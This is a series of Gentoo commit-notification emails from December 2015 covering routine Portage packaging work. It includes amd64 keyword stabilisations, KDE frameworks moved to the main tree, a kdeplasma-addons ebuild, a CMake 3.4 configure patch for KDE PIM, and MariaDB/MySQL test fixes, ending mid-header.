2015-12-14 Thread Agostino Sarubbo
commit: e379fbbf675fb8e9b855e2585addd6b46f6072e0
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:46 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:46 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=e379fbbf

dev-python/oslotest: amd64 stable wrt bug #568022

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-python/oslotest/oslotest-1.12.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-python/oslotest/oslotest-1.12.0.ebuild 
b/dev-python/oslotest/oslotest-1.12.0.ebuild
index 4b834b7..1ec9726 100644
--- a/dev-python/oslotest/oslotest-1.12.0.ebuild
+++ b/dev-python/oslotest/oslotest-1.12.0.ebuild
@@ -13,7 +13,7 @@ SRC_URI="mirror://pypi/${PN:0:1}/${PN}/${P}.tar.gz"
 
 LICENSE="Apache-2.0"
 SLOT="0"
-KEYWORDS="~amd64 ~x86 ~amd64-linux ~x86-linux"
+KEYWORDS="amd64 ~x86 ~amd64-linux ~x86-linux"
 IUSE="doc test"
 
 CDEPEND=">=dev-python/pbr-1.8[${PYTHON_USEDEP}]"



[gentoo-commits] repo/gentoo:master commit in: dev-libs/libnl/

2015-12-14 Thread Agostino Sarubbo
commit: 58cc9b70e41b072143ac9006d2ee45a9c38bff22
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:33 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:33 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=58cc9b70

dev-libs/libnl: amd64 stable wrt bug #568052

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-libs/libnl/libnl-3.2.27.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-libs/libnl/libnl-3.2.27.ebuild 
b/dev-libs/libnl/libnl-3.2.27.ebuild
index 5d9f795..1c305ae 100644
--- a/dev-libs/libnl/libnl-3.2.27.ebuild
+++ b/dev-libs/libnl/libnl-3.2.27.ebuild
@@ -18,7 +18,7 @@ SRC_URI="
 "
 LICENSE="LGPL-2.1 utils? ( GPL-2 )"
 SLOT="3"
-KEYWORDS="~alpha ~amd64 ~arm ~arm64 ~hppa ~ia64 ~mips ~ppc ~ppc64 ~s390 ~sh 
~sparc ~x86 ~amd64-linux ~ia64-linux ~x86-linux"
+KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~mips ~ppc ~ppc64 ~s390 ~sh 
~sparc ~x86 ~amd64-linux ~ia64-linux ~x86-linux"
 IUSE="static-libs python utils"
 
 RDEPEND="python? ( ${PYTHON_DEPS} )



[gentoo-commits] proj/kde:master commit in: kde-frameworks/kunitconversion/, kde-frameworks/kdesu/, ...

2015-12-14 Thread Michael Palimaka
commit: b1c576a01c9224349e42cbd66845a284bd37d73f
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 14:27:59 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 14:27:59 2015 +
URL:https://gitweb.gentoo.org/proj/kde.git/commit/?id=b1c576a0

kde-frameworks: 5.17.0 moved to main tree

Package-Manager: portage-2.2.26

 kde-frameworks/attica/attica-5.17.0.ebuild | 17 -
 kde-frameworks/baloo/baloo-5.17.0.ebuild   | 32 -
 kde-frameworks/bluez-qt/bluez-qt-5.17.0.ebuild | 29 
 .../breeze-icons/breeze-icons-5.17.0.ebuild| 18 -
 .../extra-cmake-modules-5.17.0.ebuild  | 45 
 .../frameworkintegration-5.17.0.ebuild | 49 -
 .../kactivities/kactivities-5.17.0.ebuild  | 36 --
 kde-frameworks/kapidox/kapidox-5.17.0.ebuild   | 29 
 kde-frameworks/karchive/karchive-5.17.0.ebuild | 28 
 kde-frameworks/kauth/kauth-5.17.0.ebuild   | 33 -
 kde-frameworks/kbookmarks/kbookmarks-5.17.0.ebuild | 30 
 kde-frameworks/kcmutils/kcmutils-5.17.0.ebuild | 32 -
 kde-frameworks/kcodecs/kcodecs-5.17.0.ebuild   | 14 
 .../kcompletion/kcompletion-5.17.0.ebuild  | 22 --
 kde-frameworks/kconfig/kconfig-5.17.0.ebuild   | 27 ---
 .../kconfigwidgets/kconfigwidgets-5.17.0.ebuild| 38 --
 .../kcoreaddons/kcoreaddons-5.17.0.ebuild  | 41 ---
 kde-frameworks/kcrash/kcrash-5.17.0.ebuild | 39 --
 .../kdbusaddons/kdbusaddons-5.17.0.ebuild  | 29 
 .../kdeclarative/kdeclarative-5.17.0.ebuild| 32 -
 kde-frameworks/kded/kded-5.17.0.ebuild | 36 --
 .../kdelibs4support/kdelibs4support-5.17.0.ebuild  | 83 --
 .../kdesignerplugin/kdesignerplugin-5.17.0.ebuild  | 54 --
 kde-frameworks/kdesu/kdesu-5.17.0.ebuild   | 33 -
 kde-frameworks/kdewebkit/kdewebkit-5.17.0.ebuild   | 30 
 kde-frameworks/kdnssd/kdnssd-5.17.0.ebuild | 32 -
 kde-frameworks/kdoctools/kdoctools-5.17.0.ebuild   | 24 ---
 kde-frameworks/kemoticons/kemoticons-5.17.0.ebuild | 26 ---
 .../kfilemetadata/kfilemetadata-5.17.0.ebuild  | 39 --
 .../kglobalaccel/kglobalaccel-5.17.0.ebuild| 31 
 kde-frameworks/kguiaddons/kguiaddons-5.17.0.ebuild | 23 --
 kde-frameworks/khtml/khtml-5.17.0.ebuild   | 66 -
 kde-frameworks/ki18n/ki18n-5.17.0.ebuild   | 21 --
 .../kiconthemes/kiconthemes-5.17.0.ebuild  | 27 ---
 kde-frameworks/kidletime/kidletime-5.17.0.ebuild   | 25 ---
 .../kimageformats/kimageformats-5.17.0.ebuild  | 34 -
 kde-frameworks/kinit/kinit-5.17.0.ebuild   | 40 ---
 kde-frameworks/kio/kio-5.17.0.ebuild   | 82 -
 .../kitemmodels/kitemmodels-5.17.0.ebuild  | 15 
 kde-frameworks/kitemviews/kitemviews-5.17.0.ebuild | 21 --
 .../kjobwidgets/kjobwidgets-5.17.0.ebuild  | 36 --
 kde-frameworks/kjs/kjs-5.17.0.ebuild   | 22 --
 kde-frameworks/kjsembed/kjsembed-5.17.0.ebuild | 26 ---
 .../kmediaplayer/kmediaplayer-5.17.0.ebuild| 21 --
 kde-frameworks/knewstuff/knewstuff-5.17.0.ebuild   | 33 -
 .../knotifications/knotifications-5.17.0.ebuild| 45 
 .../knotifyconfig/knotifyconfig-5.17.0.ebuild  | 25 ---
 kde-frameworks/kpackage/kpackage-5.17.0.ebuild | 22 --
 kde-frameworks/kparts/kparts-5.17.0.ebuild | 31 
 kde-frameworks/kpeople/kpeople-5.17.0.ebuild   | 33 -
 kde-frameworks/kplotting/kplotting-5.17.0.ebuild   | 19 -
 kde-frameworks/kpty/kpty-5.17.0.ebuild | 19 -
 kde-frameworks/kross/kross-5.17.0.ebuild   | 32 -
 kde-frameworks/krunner/krunner-5.17.0.ebuild   | 28 
 kde-frameworks/kservice/kservice-5.17.0.ebuild | 37 --
 .../ktexteditor/ktexteditor-5.17.0.ebuild  | 53 --
 .../ktextwidgets/ktextwidgets-5.17.0.ebuild| 38 --
 .../kunitconversion/kunitconversion-5.17.0.ebuild  | 19 -
 kde-frameworks/kwallet/kwallet-5.17.0.ebuild   | 41 ---
 .../kwidgetsaddons/kwidgetsaddons-5.17.0.ebuild| 22 --
 .../kwindowsystem/kwindowsystem-5.17.0.ebuild  | 41 ---
 kde-frameworks/kxmlgui/kxmlgui-5.17.0.ebuild   | 42 ---
 .../kxmlrpcclient/kxmlrpcclient-5.17.0.ebuild  | 23 --
 .../modemmanager-qt/modemmanager-qt-5.17.0.ebuild  | 22 --
 .../networkmanager-qt-5.17.0.ebuild| 27 ---
 .../oxygen-icons/oxygen-icons-5.17.0.ebuild| 23 --
 kde-frameworks/plasma/plasma-5.17.0-r2.ebuild  | 71 --
 kde-frameworks/solid/solid-5.17.0.ebuild   | 33 -
 kde-frameworks/sonnet/sonnet-5.17.0.ebuild | 31 
 

[gentoo-commits] repo/gentoo:master commit in: kde-plasma/kdeplasma-addons/

2015-12-14 Thread Michael Palimaka
commit: 4ff6ffb6f0cc825da7457890456ba0f5ca9b514d
Author: Andreas Sturmlechner  gmail  com>
AuthorDate: Sun Dec 13 08:22:47 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 14:33:59 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4ff6ffb6

kde-plasma/kdeplasma-addons: Add KF 5.17 compatible 5.4.3 revbump

Package-Manager: portage-2.2.24

 .../kdeplasma-addons-5.4.3-r1.ebuild   | 67 ++
 1 file changed, 67 insertions(+)

diff --git a/kde-plasma/kdeplasma-addons/kdeplasma-addons-5.4.3-r1.ebuild 
b/kde-plasma/kdeplasma-addons/kdeplasma-addons-5.4.3-r1.ebuild
new file mode 100644
index 000..14e6007
--- /dev/null
+++ b/kde-plasma/kdeplasma-addons/kdeplasma-addons-5.4.3-r1.ebuild
@@ -0,0 +1,67 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+FRAMEWORKS_MINIMAL="5.17.0"
+inherit kde5
+
+DESCRIPTION="Extra Plasma applets and engines"
+LICENSE="GPL-2 LGPL-2"
+KEYWORDS=" ~amd64 ~x86"
+IUSE="ibus scim"
+
+DEPEND="
+   $(add_frameworks_dep karchive)
+   $(add_frameworks_dep kconfig)
+   $(add_frameworks_dep kconfigwidgets)
+   $(add_frameworks_dep kcmutils)
+   $(add_frameworks_dep kcompletion)
+   $(add_frameworks_dep kcoreaddons)
+   $(add_frameworks_dep kdelibs4support)
+   $(add_frameworks_dep ki18n)
+   $(add_frameworks_dep kio)
+   $(add_frameworks_dep knewstuff)
+   $(add_frameworks_dep knotifications)
+   $(add_frameworks_dep kpackage)
+   $(add_frameworks_dep kross)
+   $(add_frameworks_dep krunner)
+   $(add_frameworks_dep kservice)
+   $(add_frameworks_dep kunitconversion)
+   $(add_frameworks_dep kwidgetsaddons)
+   $(add_frameworks_dep kwindowsystem)
+   $(add_frameworks_dep kxmlgui)
+   $(add_frameworks_dep plasma)
+   $(add_frameworks_dep sonnet)
+   dev-qt/qtdbus:5
+   dev-qt/qtdeclarative:5
+   dev-qt/qtgui:5
+   dev-qt/qtwidgets:5
+   ibus? (
+   app-i18n/ibus
+   dev-libs/glib:2
+   dev-qt/qtx11extras:5
+   x11-libs/libxcb
+   x11-libs/xcb-util-keysyms
+   )
+   scim? ( app-i18n/scim )
+"
+RDEPEND="${DEPEND}
+   $(add_plasma_dep plasma-workspace 'systemmonitor')
+   !kde-base/kdeplasma-addons:4
+"
+
+src_configure() {
+   local mycmakeargs=(
+   $(cmake-utils_use_find_package ibus IBus)
+   $(cmake-utils_use_find_package scim)
+   )
+
+   kde5_src_configure
+}
+
+src_install() {
+   kde5_src_install
+   rm "${ED}"usr/share/plasma/desktoptheme/default/widgets/notes.svgz || 
die
+}



[gentoo-commits] proj/kde:master commit in: kde-plasma/kdeplasma-addons/

2015-12-14 Thread Michael Palimaka
commit: 1315bfc95533b484acfbdb57825deb921cc82ed9
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 14:34:11 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 14:34:11 2015 +
URL:https://gitweb.gentoo.org/proj/kde.git/commit/?id=1315bfc9

kde-plasma/kdeplasma-addons: moved to main tree

Package-Manager: portage-2.2.26

 .../kdeplasma-addons-5.4.3-r1.ebuild   | 67 --
 1 file changed, 67 deletions(-)

diff --git a/kde-plasma/kdeplasma-addons/kdeplasma-addons-5.4.3-r1.ebuild 
b/kde-plasma/kdeplasma-addons/kdeplasma-addons-5.4.3-r1.ebuild
deleted file mode 100644
index 14e6007..000
--- a/kde-plasma/kdeplasma-addons/kdeplasma-addons-5.4.3-r1.ebuild
+++ /dev/null
@@ -1,67 +0,0 @@
-# Copyright 1999-2015 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-FRAMEWORKS_MINIMAL="5.17.0"
-inherit kde5
-
-DESCRIPTION="Extra Plasma applets and engines"
-LICENSE="GPL-2 LGPL-2"
-KEYWORDS=" ~amd64 ~x86"
-IUSE="ibus scim"
-
-DEPEND="
-   $(add_frameworks_dep karchive)
-   $(add_frameworks_dep kconfig)
-   $(add_frameworks_dep kconfigwidgets)
-   $(add_frameworks_dep kcmutils)
-   $(add_frameworks_dep kcompletion)
-   $(add_frameworks_dep kcoreaddons)
-   $(add_frameworks_dep kdelibs4support)
-   $(add_frameworks_dep ki18n)
-   $(add_frameworks_dep kio)
-   $(add_frameworks_dep knewstuff)
-   $(add_frameworks_dep knotifications)
-   $(add_frameworks_dep kpackage)
-   $(add_frameworks_dep kross)
-   $(add_frameworks_dep krunner)
-   $(add_frameworks_dep kservice)
-   $(add_frameworks_dep kunitconversion)
-   $(add_frameworks_dep kwidgetsaddons)
-   $(add_frameworks_dep kwindowsystem)
-   $(add_frameworks_dep kxmlgui)
-   $(add_frameworks_dep plasma)
-   $(add_frameworks_dep sonnet)
-   dev-qt/qtdbus:5
-   dev-qt/qtdeclarative:5
-   dev-qt/qtgui:5
-   dev-qt/qtwidgets:5
-   ibus? (
-   app-i18n/ibus
-   dev-libs/glib:2
-   dev-qt/qtx11extras:5
-   x11-libs/libxcb
-   x11-libs/xcb-util-keysyms
-   )
-   scim? ( app-i18n/scim )
-"
-RDEPEND="${DEPEND}
-   $(add_plasma_dep plasma-workspace 'systemmonitor')
-   !kde-base/kdeplasma-addons:4
-"
-
-src_configure() {
-   local mycmakeargs=(
-   $(cmake-utils_use_find_package ibus IBus)
-   $(cmake-utils_use_find_package scim)
-   )
-
-   kde5_src_configure
-}
-
-src_install() {
-   kde5_src_install
-   rm "${ED}"usr/share/plasma/desktoptheme/default/widgets/notes.svgz || 
die
-}



[gentoo-commits] dev/dev-zero:master commit in: sci-electronics/qucs/

2015-12-14 Thread Tiziano Müller
commit: b7985f774a1f1c23fd864e502c440b33ccd199d6
Author: Tiziano Müller  gentoo  org>
AuthorDate: Mon Dec 14 12:52:08 2015 +
Commit: Tiziano Müller  gentoo  org>
CommitDate: Mon Dec 14 12:52:08 2015 +
URL:https://gitweb.gentoo.org/dev/dev-zero.git/commit/?id=b7985f77

sci-electronics/qucs: import version bump from booboo overlay

 sci-electronics/qucs/Manifest  |  1 +
 sci-electronics/qucs/qucs-0.0.19.150523.ebuild | 36 ++
 2 files changed, 37 insertions(+)

diff --git a/sci-electronics/qucs/Manifest b/sci-electronics/qucs/Manifest
new file mode 100644
index 000..0342f40
--- /dev/null
+++ b/sci-electronics/qucs/Manifest
@@ -0,0 +1 @@
+DIST qucs-0.0.19-150523-git-0046130.tar.gz 48174723 SHA256 
6deb5ee2d76b2c87e62c2b5eff17dfa4b99be3972463447d5640880411234c82 SHA512 
01b2babbed992c9a4a4bf5dbe9a327e716a7b047682947a198821e838188b9218a3ef38977e531f34c69069f04e820a9bf8bd26c9791106f12d92bdefde72cfb
 WHIRLPOOL 
e21b836d1d4b4840504505162bd40c77142fbdeb2d8ca7d2a8393c78fb6b1a3f0d356e823930df9c2272a40b351200564bdb806afeb22ff5287d56c29a120f0b

diff --git a/sci-electronics/qucs/qucs-0.0.19.150523.ebuild 
b/sci-electronics/qucs/qucs-0.0.19.150523.ebuild
new file mode 100644
index 000..54a5f68
--- /dev/null
+++ b/sci-electronics/qucs/qucs-0.0.19.150523.ebuild
@@ -0,0 +1,36 @@
+# Copyright 1999-2013 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+MY_P="${PN}-0.0.19-150523-git-0046130"
+
+inherit autotools-utils flag-o-matic toolchain-funcs
+
+DESCRIPTION="Quite Universal Circuit Simulator in Qt4"
+HOMEPAGE="http://qucs.sourceforge.net/;
+SRC_URI="mirror://sourceforge/${PN}/${MY_P}.tar.gz"
+S="$WORKDIR/${MY_P}"
+
+LICENSE="GPL-2"
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE=""
+
+RDEPEND="dev-qt/qtcore:4[qt3support]
+   dev-qt/qtgui:4[qt3support]
+   dev-qt/qt3support:4
+   x11-libs/libX11"
+DEPEND="${RDEPEND}"
+
+AUTOTOOLS_IN_SOURCE_BUILD=1
+
+src_configure() {
+   # the package doesn't use pkg-config on Linux, only on Darwin
+   # very smart of upstream...
+   append-ldflags $( $(tc-getPKG_CONFIG) --libs-only-L \
+   QtCore QtGui QtXml Qt3Support )
+
+   autotools-utils_src_configure
+}



[gentoo-commits] repo/gentoo:master commit in: kde-base/kmail/, kde-base/kmail/files/, kde-base/konsolekalendar/, ...

2015-12-14 Thread Michael Palimaka
commit: b6eb841a21cd2b4e491d69d6d08e6cfadb4dbb2b
Author: Andreas Sturmlechner  gmail  com>
AuthorDate: Sun Dec 13 18:54:59 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:12:17 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=b6eb841a

kde-base: Add >=cmake-3.4 configure fix for KDE PIM

See also: https://bugs.gentoo.org/show_bug.cgi?id=566058
Tested-by: Vadim

Package-Manager: portage-2.2.24

 .../kmail/files/kdepim-4.14.10-fix-cmake-3.4.patch | 23 ++
 kde-base/kmail/kmail-4.14.10.ebuild|  2 ++
 .../files/kdepim-4.14.10-fix-cmake-3.4.patch   | 23 ++
 .../konsolekalendar/konsolekalendar-4.14.10.ebuild |  2 ++
 .../files/kdepim-4.14.10-fix-cmake-3.4.patch   | 23 ++
 kde-base/korganizer/korganizer-4.14.10.ebuild  |  6 --
 6 files changed, 77 insertions(+), 2 deletions(-)

diff --git a/kde-base/kmail/files/kdepim-4.14.10-fix-cmake-3.4.patch 
b/kde-base/kmail/files/kdepim-4.14.10-fix-cmake-3.4.patch
new file mode 100644
index 000..4039cbf
--- /dev/null
+++ b/kde-base/kmail/files/kdepim-4.14.10-fix-cmake-3.4.patch
@@ -0,0 +1,23 @@
+From: Andreas Sturmlechner 
+Date: Sun, 13 Dec 2015 09:20:24 +
+Subject: Fix configure with >=cmake-3.4
+X-Git-Url: 
http://quickgit.kde.org/?p=kdepim.git=commitdiff=91275a772e51a4031b8f34bc83652b5e60478624
+---
+Fix configure with >=cmake-3.4
+
+REVIEW: 126334
+---
+
+
+--- a/CMakeLists.txt
 b/CMakeLists.txt
+@@ -3,6 +3,8 @@
+ 
+ # where to look first for cmake modules. This line must be the first one or 
cmake will use the system's FindFoo.cmake
+ set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} 
"${CMAKE_SOURCE_DIR}/cmake/modules")
++
++include(CheckIncludeFiles)
+ 
+ ### Build Options ###
+ 
+

diff --git a/kde-base/kmail/kmail-4.14.10.ebuild 
b/kde-base/kmail/kmail-4.14.10.ebuild
index 490a793..df4cbe3 100644
--- a/kde-base/kmail/kmail-4.14.10.ebuild
+++ b/kde-base/kmail/kmail-4.14.10.ebuild
@@ -74,6 +74,8 @@ KMEXTRA="
 
 KMLOADLIBS="kdepim-common-libs"
 
+PATCHES=( "${FILESDIR}/kdepim-4.14.10-fix-cmake-3.4.patch" )
+
 src_configure() {
# Bug 308903
use ppc64 && append-flags -mminimal-toc

diff --git a/kde-base/konsolekalendar/files/kdepim-4.14.10-fix-cmake-3.4.patch 
b/kde-base/konsolekalendar/files/kdepim-4.14.10-fix-cmake-3.4.patch
new file mode 100644
index 000..4039cbf
--- /dev/null
+++ b/kde-base/konsolekalendar/files/kdepim-4.14.10-fix-cmake-3.4.patch
@@ -0,0 +1,23 @@
+From: Andreas Sturmlechner 
+Date: Sun, 13 Dec 2015 09:20:24 +
+Subject: Fix configure with >=cmake-3.4
+X-Git-Url: 
http://quickgit.kde.org/?p=kdepim.git=commitdiff=91275a772e51a4031b8f34bc83652b5e60478624
+---
+Fix configure with >=cmake-3.4
+
+REVIEW: 126334
+---
+
+
+--- a/CMakeLists.txt
 b/CMakeLists.txt
+@@ -3,6 +3,8 @@
+ 
+ # where to look first for cmake modules. This line must be the first one or 
cmake will use the system's FindFoo.cmake
+ set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} 
"${CMAKE_SOURCE_DIR}/cmake/modules")
++
++include(CheckIncludeFiles)
+ 
+ ### Build Options ###
+ 
+

diff --git a/kde-base/konsolekalendar/konsolekalendar-4.14.10.ebuild 
b/kde-base/konsolekalendar/konsolekalendar-4.14.10.ebuild
index 8484f8b..bd67439 100644
--- a/kde-base/konsolekalendar/konsolekalendar-4.14.10.ebuild
+++ b/kde-base/konsolekalendar/konsolekalendar-4.14.10.ebuild
@@ -46,3 +46,5 @@ KMEXTRACTONLY="
 "
 
 KMLOADLIBS="kdepim-common-libs"
+
+PATCHES=( "${FILESDIR}/kdepim-4.14.10-fix-cmake-3.4.patch" )

diff --git a/kde-base/korganizer/files/kdepim-4.14.10-fix-cmake-3.4.patch 
b/kde-base/korganizer/files/kdepim-4.14.10-fix-cmake-3.4.patch
new file mode 100644
index 000..4039cbf
--- /dev/null
+++ b/kde-base/korganizer/files/kdepim-4.14.10-fix-cmake-3.4.patch
@@ -0,0 +1,23 @@
+From: Andreas Sturmlechner 
+Date: Sun, 13 Dec 2015 09:20:24 +
+Subject: Fix configure with >=cmake-3.4
+X-Git-Url: 
http://quickgit.kde.org/?p=kdepim.git=commitdiff=91275a772e51a4031b8f34bc83652b5e60478624
+---
+Fix configure with >=cmake-3.4
+
+REVIEW: 126334
+---
+
+
+--- a/CMakeLists.txt
 b/CMakeLists.txt
+@@ -3,6 +3,8 @@
+ 
+ # where to look first for cmake modules. This line must be the first one or 
cmake will use the system's FindFoo.cmake
+ set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} 
"${CMAKE_SOURCE_DIR}/cmake/modules")
++
++include(CheckIncludeFiles)
+ 
+ ### Build Options ###
+ 
+

diff --git a/kde-base/korganizer/korganizer-4.14.10.ebuild 
b/kde-base/korganizer/korganizer-4.14.10.ebuild
index d15bdb9..1f45e35 100644
--- a/kde-base/korganizer/korganizer-4.14.10.ebuild
+++ b/kde-base/korganizer/korganizer-4.14.10.ebuild
@@ -68,6 +68,8 @@ src_unpack() {
 }
 
 src_prepare() {
+   epatch "${FILESDIR}/kdepim-4.14.10-fix-cmake-3.4.patch"
+
use handbook 

[gentoo-commits] repo/gentoo:master commit in: dev-db/mariadb/

2015-12-14 Thread Brian Evans
commit: 2800a9f4724748e953c61b98eccce43b838ffd58
Author: Brian Evans  gentoo  org>
AuthorDate: Mon Dec 14 14:34:51 2015 +
Commit: Brian Evans  gentoo  org>
CommitDate: Mon Dec 14 14:35:31 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=2800a9f4

dev-db/mariadb: Fix tests due to removed USE flag

Package-Manager: portage-2.2.26

 dev-db/mariadb/mariadb-10.1.9-r1.ebuild | 7 ---
 1 file changed, 7 deletions(-)

diff --git a/dev-db/mariadb/mariadb-10.1.9-r1.ebuild 
b/dev-db/mariadb/mariadb-10.1.9-r1.ebuild
index 6fbdc74..30ae246 100644
--- a/dev-db/mariadb/mariadb-10.1.9-r1.ebuild
+++ b/dev-db/mariadb/mariadb-10.1.9-r1.ebuild
@@ -137,13 +137,6 @@ multilib_src_test() {
retstatus_unit=$?
[[ $retstatus_unit -eq 0 ]] || eerror "test-unit failed"
 
-   # Create a symlink to provided binaries so the tests can find 
them when client-libs is off
-   if ! use client-libs ; then
-   ln -srf /usr/bin/my_print_defaults 
"${BUILD_DIR}/client/my_print_defaults" || die
-   ln -srf /usr/bin/perror "${BUILD_DIR}/client/perror" || 
die
-   mysql-multilib-r1_disable_test main.perror "String 
mismatch due to not building local perror"
-   fi
-
# Ensure that parallel runs don't die
export MTR_BUILD_THREAD="$((${RANDOM} % 100))"
# Enable parallel testing, auto will try to detect number of 
cores



[gentoo-commits] repo/gentoo:master commit in: dev-db/mysql/

2015-12-14 Thread Brian Evans
commit: 3ebff50c7ef89f55f3830ff1389bab68e25e68b3
Author: Brian Evans  gentoo  org>
AuthorDate: Mon Dec 14 14:27:10 2015 +
Commit: Brian Evans  gentoo  org>
CommitDate: Mon Dec 14 14:35:21 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=3ebff50c

dev-db/mysql: Fix tests with removed USE flag

Package-Manager: portage-2.2.26

 dev-db/mysql/mysql-5.6.28.ebuild | 7 ---
 1 file changed, 7 deletions(-)

diff --git a/dev-db/mysql/mysql-5.6.28.ebuild b/dev-db/mysql/mysql-5.6.28.ebuild
index 959b86e..716cd4f 100644
--- a/dev-db/mysql/mysql-5.6.28.ebuild
+++ b/dev-db/mysql/mysql-5.6.28.ebuild
@@ -74,13 +74,6 @@ multilib_src_test() {
retstatus_unit=$?
[[ $retstatus_unit -eq 0 ]] || eerror "test-unit failed"
 
-   # Create a symlink to provided binaries so the tests can find 
them when client-libs is off
-   if ! use client-libs ; then
-   ln -srf /usr/bin/my_print_defaults 
"${BUILD_DIR}/client/my_print_defaults" || die
-   ln -srf /usr/bin/perror "${BUILD_DIR}/client/perror" || 
die
-   mysql-multilib_disable_test main.perror "String 
mismatch due to not building local perror"
-   fi
-
# Ensure that parallel runs don't die
export MTR_BUILD_THREAD="$((${RANDOM} % 100))"
# Enable parallel testing, auto will try to detect number of 
cores



[gentoo-commits] repo/gentoo:master commit in: media-video/mkvtoolnix/

2015-12-14 Thread Agostino Sarubbo
commit: b23eb7eaba11c32a40c0aacfd28e45d7bb9b675f
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:59 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:59 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=b23eb7ea

media-video/mkvtoolnix: amd64 stable wrt bug #562484

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 media-video/mkvtoolnix/mkvtoolnix-8.5.2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/media-video/mkvtoolnix/mkvtoolnix-8.5.2.ebuild 
b/media-video/mkvtoolnix/mkvtoolnix-8.5.2.ebuild
index 4d20251..d385753 100644
--- a/media-video/mkvtoolnix/mkvtoolnix-8.5.2.ebuild
+++ b/media-video/mkvtoolnix/mkvtoolnix-8.5.2.ebuild
@@ -11,7 +11,7 @@ 
SRC_URI="http://www.bunkus.org/videotools/mkvtoolnix/sources/${P}.tar.xz;
 
 LICENSE="GPL-2"
 SLOT="0"
-KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd ~amd64-linux ~x86-linux"
+KEYWORDS="amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd ~amd64-linux ~x86-linux"
 IUSE="curl debug pch test qt5"
 
 ruby_atom() {



[gentoo-commits] repo/gentoo:master commit in: dev-db/sqlite/

2015-12-14 Thread Agostino Sarubbo
commit: 0d39eecef1b5a951b4b268c6f2ce8876796205e6
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:12:18 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:12:18 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=0d39eece

dev-db/sqlite: amd64 stable wrt bug #567998

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-db/sqlite/sqlite-3.9.2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-db/sqlite/sqlite-3.9.2.ebuild 
b/dev-db/sqlite/sqlite-3.9.2.ebuild
index bd85c52..27a57aa 100644
--- a/dev-db/sqlite/sqlite-3.9.2.ebuild
+++ b/dev-db/sqlite/sqlite-3.9.2.ebuild
@@ -20,7 +20,7 @@ SRC_URI="doc? ( 
http://sqlite.org/2015/${PN}-doc-${DOC_PV}.zip )
 
 LICENSE="public-domain"
 SLOT="3"
-KEYWORDS="~alpha ~amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 ~s390 
~sh ~sparc ~x86 ~ppc-aix ~amd64-fbsd ~sparc-fbsd ~x86-fbsd ~x86-freebsd 
~hppa-hpux ~ia64-hpux ~x86-interix ~amd64-linux ~arm-linux ~x86-linux 
~ppc-macos ~x64-macos ~x86-macos ~m68k-mint ~sparc-solaris ~sparc64-solaris 
~x64-solaris ~x86-solaris"
+KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 ~s390 
~sh ~sparc ~x86 ~ppc-aix ~amd64-fbsd ~sparc-fbsd ~x86-fbsd ~x86-freebsd 
~hppa-hpux ~ia64-hpux ~x86-interix ~amd64-linux ~arm-linux ~x86-linux 
~ppc-macos ~x64-macos ~x86-macos ~m68k-mint ~sparc-solaris ~sparc64-solaris 
~x64-solaris ~x86-solaris"
 IUSE="debug doc icu +readline secure-delete static-libs tcl test tools"
 
 RDEPEND="icu? ( dev-libs/icu:0=[${MULTILIB_USEDEP}] )



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/ruby-openid/

2015-12-14 Thread Agostino Sarubbo
commit: e7314e0ee17a0c4b868a31704ecba81f5feb555f
